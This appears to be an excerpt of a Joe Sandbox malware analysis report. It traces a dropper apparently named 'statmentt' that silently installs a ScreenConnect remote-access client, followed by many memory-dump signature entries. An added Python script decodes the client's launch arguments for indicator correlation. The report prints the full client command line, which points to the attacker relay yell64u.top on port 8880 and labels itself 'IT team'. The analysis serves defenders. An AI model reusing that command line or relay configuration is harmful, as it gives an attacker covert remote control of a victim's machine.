                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:11:29:09
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\System32\msiexec.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                            Imagebase:0x7ff6721a0000
                                                                                            File size:69'632 bytes
                                                                                            MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:3
                                                                                            Start time:11:29:09
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF C
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:11:29:10
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                            Imagebase:0x130000
                                                                                            File size:61'440 bytes
                                                                                            MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:11:29:11
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:11:29:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000
                                                                                            Imagebase:0x1c0000
                                                                                            File size:59'904 bytes
                                                                                            MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:11:29:12
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="
                                                                                            Imagebase:0xf60000
                                                                                            File size:95'520 bytes
                                                                                            MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:11:29:14
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User"
                                                                                            Imagebase:0xa0000
                                                                                            File size:601'376 bytes
                                                                                            MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:9
                                                                                            Start time:11:29:17
                                                                                            Start date:19/12/2024
                                                                                            Path:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System"
                                                                                            Imagebase:0xd50000
                                                                                            File size:601'376 bytes
                                                                                            MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true
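
The two pieces of this report an analyst pivots on are the ScreenConnect.ClientService.exe command line of Target ID 7 and the DNS/TCP rows above it. The following script is an added example, not part of the Joe Sandbox report or of ScreenConnect itself: it splits the quoted argument into its fields, decodes the k= value as a Microsoft CryptoAPI PUBLICKEYBLOB, and ties the h=/p= relay settings to the DNS answer and the port-8880 flow observed in the sandbox. The field meanings (h = relay host, p = relay port, s = session id, k = relay public key, c = custom property slots) are this example's reading of the values on the page, not vendor documentation, and the DNS_ANSWERS / TCP_FLOWS lists are hand-copied reductions of the report's tables.

```python
"""Added example (not from the report): decode the ScreenConnect client command
line captured for Target ID 7 and cross-check it against the DNS/TCP rows above.
Field meanings are this example's reading of the page, not vendor documentation."""
import base64
import hashlib
import re
import struct
from urllib.parse import parse_qs

# Command line of Target ID 7, copied verbatim from the report.
CLIENT_CMDLINE = (
    r'"C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e'
    '&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8'
    'PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8'
    '%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR'
    '6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IW'
    'wtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA'
    '&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="'
)


def quoted_args(cmdline):
    """Return the double-quoted arguments of a Windows command line, in order."""
    return re.findall(r'"([^"]*)"', cmdline)


def parse_client_args(cmdline):
    """Extract the relay-related indicators from the ClientService.exe argument string."""
    image, query = quoted_args(cmdline)[:2]
    fields = parse_qs(query.lstrip("?"), keep_blank_values=True)
    m = re.search(r"ScreenConnect Client \(([0-9a-f]+)\)", image)
    return {
        "image": image,
        "instance_id": m.group(1) if m else None,  # same id as the Temp\ScreenConnect\<id>\setup.msi folder
        "session_type": fields["e"][0],            # "Access" on this page
        "relay_host": fields["h"][0],
        "relay_port": int(fields["p"][0]),
        "session_id": fields["s"][0],
        "public_key_b64": fields["k"][0],          # parse_qs already undoes the %2f / %2b escapes
        "custom_fields": fields.get("c", []),      # eight operator-filled slots; here "IT" and "IT team"
    }


def parse_capi_rsa_public_blob(b64):
    """Decode a base64 CryptoAPI PUBLICKEYBLOB: BLOBHEADER (8 bytes) + RSAPUBKEY (12 bytes) + modulus."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    blob_type, version, _reserved, alg_id = struct.unpack_from("<BBHI", raw, 0)
    magic, bit_length, public_exponent = struct.unpack_from("<4sII", raw, 8)
    modulus = raw[20:]                                    # little-endian, bit_length/8 bytes
    return {
        "blob_type": blob_type,            # 0x06 = PUBLICKEYBLOB
        "version": version,                # 0x02 = CUR_BLOB_VERSION
        "alg_id": alg_id,                  # 0xA400 = CALG_RSA_KEYX
        "magic": magic,                    # b"RSA1" marks a public key (b"RSA2" would be a private key)
        "bit_length": bit_length,
        "public_exponent": public_exponent,
        "modulus_bytes": len(modulus),
        "sha256": hashlib.sha256(raw).hexdigest(),  # stable fingerprint to pivot on across samples
    }


# DNS answer and TCP rows from the tables above, reduced to the fields used here (hand-copied).
DNS_ANSWERS = [{"name": "yell64u.top", "address": "85.239.34.190"}]
TCP_FLOWS = [
    {"src": "192.168.2.4", "sport": 49731, "dst": "85.239.34.190", "dport": 8880},
    {"src": "85.239.34.190", "sport": 8880, "dst": "192.168.2.4", "dport": 49731},
]


def correlate_relay(args, dns_answers, tcp_flows):
    """Tie the relay host from the command line to the addresses it resolved to and
    to the outbound flows that reach the configured relay port."""
    host = args["relay_host"].lower()
    resolved = {a["address"] for a in dns_answers if a["name"].lower() == host}
    outbound = [f for f in tcp_flows if f["dst"] in resolved and f["dport"] == args["relay_port"]]
    return {"resolved": sorted(resolved), "outbound_flows": outbound}


if __name__ == "__main__":
    args = parse_client_args(CLIENT_CMDLINE)
    key = parse_capi_rsa_public_blob(args["public_key_b64"])
    print(f"relay {args['relay_host']}:{args['relay_port']} session {args['session_id']} "
          f"instance {args['instance_id']} custom {args['custom_fields']}")
    print(f"key {key['magic']} {key['bit_length']}-bit e={key['public_exponent']} sha256={key['sha256']}")
    print(correlate_relay(args, DNS_ANSWERS, TCP_FLOWS))
```

The blob header is the quickest sanity check on a k= value: the first bytes decode to 06 02 00 00 00 A4 00 00 "RSA1", i.e. a PUBLICKEYBLOB for CALG_RSA_KEYX, followed by a 2048-bit length and the exponent 65537. The SHA-256 of the decoded blob, the relay host and the instance id are the values worth keeping as indicators, since they survive renaming of the dropper.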

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C8${/
                                                                                              • API String ID: 0-4231431693
                                                                                              • Opcode ID: 291533a129be21e5e34088d01b3009f10b48af1af1ab25e22f7eb81fb079db80
                                                                                              • Instruction ID: d5cddf8180e6da9fd81560b11ae9ae04e3d17564ed768381cdd80c3528853993
                                                                                              • Opcode Fuzzy Hash: 291533a129be21e5e34088d01b3009f10b48af1af1ab25e22f7eb81fb079db80
                                                                                              • Instruction Fuzzy Hash: AA61C0313103024BC716AB7CE89466EBFEAFBD52513409669E519CB391EF74FC968B80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (bq$Hbq
                                                                                              • API String ID: 0-4081012451
                                                                                              • Opcode ID: 2cba2a1b09bf503d2cd5e532952378b9954eee92b8e8920d0d3884a76a5c6266
                                                                                              • Instruction ID: fed4bca5ded938f52fc64eed409b3ad988a55e010c57d7a1fdd0246c0883b62c
                                                                                              • Opcode Fuzzy Hash: 2cba2a1b09bf503d2cd5e532952378b9954eee92b8e8920d0d3884a76a5c6266
                                                                                              • Instruction Fuzzy Hash: 1441B135B042498FCF159FADC4946AFFBA2FF85250B14846AEA05CB385DA34ED058BA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (bq
                                                                                              • API String ID: 0-149360118
                                                                                              • Opcode ID: 7e8969e5a03e1f52d5678a5089abc25b85faa97dbd90b649034ac5742df13ec6
                                                                                              • Instruction ID: a785f1fdf519e6bed1b1f1a5d3974deef0cb3da9c5c5a6e53effde98eb7b9116
                                                                                              • Opcode Fuzzy Hash: 7e8969e5a03e1f52d5678a5089abc25b85faa97dbd90b649034ac5742df13ec6
                                                                                              • Instruction Fuzzy Hash: 6D612534B106158FCB14DF69D89496EB7F2FF8D315B1085A8E6069B365DB30EC01DB41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: K]
                                                                                              • API String ID: 0-3798347547
                                                                                              • Opcode ID: 0d031e90a930da423a4ad0b46c81db81b825e0ae282e078bb7e4489160d7104b
                                                                                              • Instruction ID: 3d8864d2f61bacb0fdaf3b96077d7d01e3e2cacaa3e61a14ee835dd2909e9967
                                                                                              • Opcode Fuzzy Hash: 0d031e90a930da423a4ad0b46c81db81b825e0ae282e078bb7e4489160d7104b
                                                                                              • Instruction Fuzzy Hash: 96319075A053405FCB42DF6998A049EFFF1EF9625070584ABD948CF366EA30EC09C7A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Te^q
                                                                                              • API String ID: 0-671973202
                                                                                              • Opcode ID: 128c55415417e8731c39d63902099ae67831f94deaf04a5f76076c9b64cb1dd3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42c4cc033c35a6f8181de51544580591db46fca93bf111400a630c8a47e8b4bf
                                                                                              • Instruction ID: f52a08fbbed4016036312ce656c43bee0f0bb17b9b278ae0b4535c14a0103dc9
                                                                                              • Opcode Fuzzy Hash: 42c4cc033c35a6f8181de51544580591db46fca93bf111400a630c8a47e8b4bf
                                                                                              • Instruction Fuzzy Hash: FB31DA706007028FC730DF2AC84465AB7F2EF89365B144A6CE696DB7A1D731E946CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f21cb8803ed8562171f633515013f025d1255df9a4f064bdbb3eae920582c9a0
                                                                                              • Instruction ID: 0b52aa4ea1f4abf00d97ee77392ea4acfb8b51d112e8a7b15c7357741974516f
                                                                                              • Opcode Fuzzy Hash: f21cb8803ed8562171f633515013f025d1255df9a4f064bdbb3eae920582c9a0
                                                                                              • Instruction Fuzzy Hash: BE21DE313003021BC316B67DE89572FBADAEBD52A17548A6DE519CB394EE70EC4283D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8b733592a2626b884eb9fd1e3251224b5cf3ca7372668bcc36e41a21a7076bbb
                                                                                              • Instruction ID: 3cee1b9e33a749c73540fa93fa8b0399b00fb9a03d22e28a1bcea6c7a452d40b
                                                                                              • Opcode Fuzzy Hash: 8b733592a2626b884eb9fd1e3251224b5cf3ca7372668bcc36e41a21a7076bbb
                                                                                              • Instruction Fuzzy Hash: 8A31E7746007118FC730DF2AD84466BBBF1EF89321B144A6CD6A69B7A5D730E94ACF81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d05e27b971408e316132a5abbd253be649435a25d09b4114b7442159a732045c
                                                                                              • Instruction ID: 8e517d85dad61cf0533c6f33e041d3dd0db18986761ab0addda67ac122980290
                                                                                              • Opcode Fuzzy Hash: d05e27b971408e316132a5abbd253be649435a25d09b4114b7442159a732045c
                                                                                              • Instruction Fuzzy Hash: 8821CF313003021BC305B67DE89472FBADBEBD42917508A69E5198B394EE70EC4283D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eaa11c4976232529a861632c569fcd6732cf70a8ed015b869330649ecca60b61
                                                                                              • Instruction ID: 48221d922a450136adc685fb0a4bed298b43002b20305ac17711a05d907ed4dd
                                                                                              • Opcode Fuzzy Hash: eaa11c4976232529a861632c569fcd6732cf70a8ed015b869330649ecca60b61
                                                                                              • Instruction Fuzzy Hash: 00212870A017058BDB35DF29D8487ABFBF6AF85324B044A6CE66697394D730E904CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3bc3008beec569c151423b592bbe18c824ac2fadc53e11ca30dba4eb58c418c6
                                                                                              • Instruction ID: 976b789a957373688ab9ad1acb52780ac941e35fd3a3392cc4ec1b0c2a4e6fa3
                                                                                              • Opcode Fuzzy Hash: 3bc3008beec569c151423b592bbe18c824ac2fadc53e11ca30dba4eb58c418c6
                                                                                              • Instruction Fuzzy Hash: 5E21E271E012188FDB59CFAAD8146EEBBF2AF89310F04C16AD414A7364DB341A06CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d1fac57a551f6cbcc234a77e64c67e5db098b5faccbb4958df6dbf9f26249574
                                                                                              • Instruction ID: 358cf4f03ee2df58d835a29c61aefb49b0e72b7003d04f1d11042a3006ce055b
                                                                                              • Opcode Fuzzy Hash: d1fac57a551f6cbcc234a77e64c67e5db098b5faccbb4958df6dbf9f26249574
                                                                                              • Instruction Fuzzy Hash: 1E2171306002068BDF28CF28D9C559BBBB5EF49320B044169EA259F2D9DB31D955CBE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e16f312be568615e6f71244c15a3ecabe662625e32a1a11b5a5f6e5cfefb2c9b
                                                                                              • Instruction ID: ac9a8d1469fbc0dd4679e32b49052b9d06dfc66cd25198e7810cbc982b0d0c18
                                                                                              • Opcode Fuzzy Hash: e16f312be568615e6f71244c15a3ecabe662625e32a1a11b5a5f6e5cfefb2c9b
                                                                                              • Instruction Fuzzy Hash: 6A2119302047058FDB35CF6AD84859BFBF1EB49320B004A6DE5679B6E5DB31A94ACF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d418fabb4598e271bd85792ae8ddcadeadc155f63f3a9a7279bdc35760f8ad0c
                                                                                              • Instruction ID: 2fb62a46b1fded2f96b306361c13676143b5e7a6bbb9ce11b0eae21f01da8df6
                                                                                              • Opcode Fuzzy Hash: d418fabb4598e271bd85792ae8ddcadeadc155f63f3a9a7279bdc35760f8ad0c
                                                                                              • Instruction Fuzzy Hash: 9A11E536A002149BCB214A58C8085AFFFB6DFC9320F1644BDFB0AAB361DB30D9059BD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0068b9cac94c7dc94f9ce36252171f39ced7f729d70f4c3442b285518efb78f9
                                                                                              • Instruction ID: 0d072193756c8735f48ac29053e499ea5cfe1bf3e671d326fbe17c24864f0d5c
                                                                                              • Opcode Fuzzy Hash: 0068b9cac94c7dc94f9ce36252171f39ced7f729d70f4c3442b285518efb78f9
                                                                                              • Instruction Fuzzy Hash: 7511E937B00214CBCF215A58D8085AEFBB5DFC8711B0540B9EB0AA7360DB30D915CBD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e4fec73149503414e3495905109c43514781bb202ce04d06f4df76bf36e64fe
                                                                                              • Instruction ID: 63247be79d78acae18c113041b4b93054e6be43373743ff4c528cb2d83303b43
                                                                                              • Opcode Fuzzy Hash: 6e4fec73149503414e3495905109c43514781bb202ce04d06f4df76bf36e64fe
                                                                                              • Instruction Fuzzy Hash: 91114C74E0020A9FCB44DFA8D4509AEFBB2FF89300F11C46AD919AB361D734A901CF91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 07a26defb9c228e533ec4729ceb90404d322de1a1d8e6df91fb37bd5499c9dc6
                                                                                              • Instruction ID: f9622b5735b04956a7b115bf161da1994312e5d109eea4ac60be02af2fbbe7ba
                                                                                              • Opcode Fuzzy Hash: 07a26defb9c228e533ec4729ceb90404d322de1a1d8e6df91fb37bd5499c9dc6
                                                                                              • Instruction Fuzzy Hash: F2118C3160024ADBCF25CE9AD888AAFFBA5EF85610B04442AEF54CB345D770E950CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 161db1279148276879eec96ec6602070c4cbe364dc7835ff2109cd71d46d55cd
                                                                                              • Instruction ID: a70774c7aab8d1aa51f952b5402c87050132a5a216d4edce902eb65e07f948e8
                                                                                              • Opcode Fuzzy Hash: 161db1279148276879eec96ec6602070c4cbe364dc7835ff2109cd71d46d55cd
                                                                                              • Instruction Fuzzy Hash: 961106B4E0020A9FCB44DFA9D4549AEFBB1FF89300F11846AD919A7360DB34A9018B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 47262b8d4ba0ffc5ab55ea114c63a0d042e89b1e76f5eeec4bea0457d8266bea
                                                                                              • Instruction ID: 358bd81d0296d411119ca1a3abc87420e2b0fd2d67b449701e9449477ced0f1f
                                                                                              • Opcode Fuzzy Hash: 47262b8d4ba0ffc5ab55ea114c63a0d042e89b1e76f5eeec4bea0457d8266bea
                                                                                              • Instruction Fuzzy Hash: 5F01F5312003459FC7139B3DA4245AF7FE5EFC52A1B4545AEEA598F352DA218C04CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1784295764.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_17f0000_statmentt.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e013a6dbb52dce508260360e26a42f9ef5a4126d0de7cb933c8cd2a9666f6cc8
                                                                                              • Instruction ID: 12b0c3c8f2a9c0f5a7fc2205682a225b8169fcf2c7ff471f750146aea2f72de0
                                                                                              • Opcode Fuzzy Hash: e013a6dbb52dce508260360e26a42f9ef5a4126d0de7cb933c8cd2a9666f6cc8
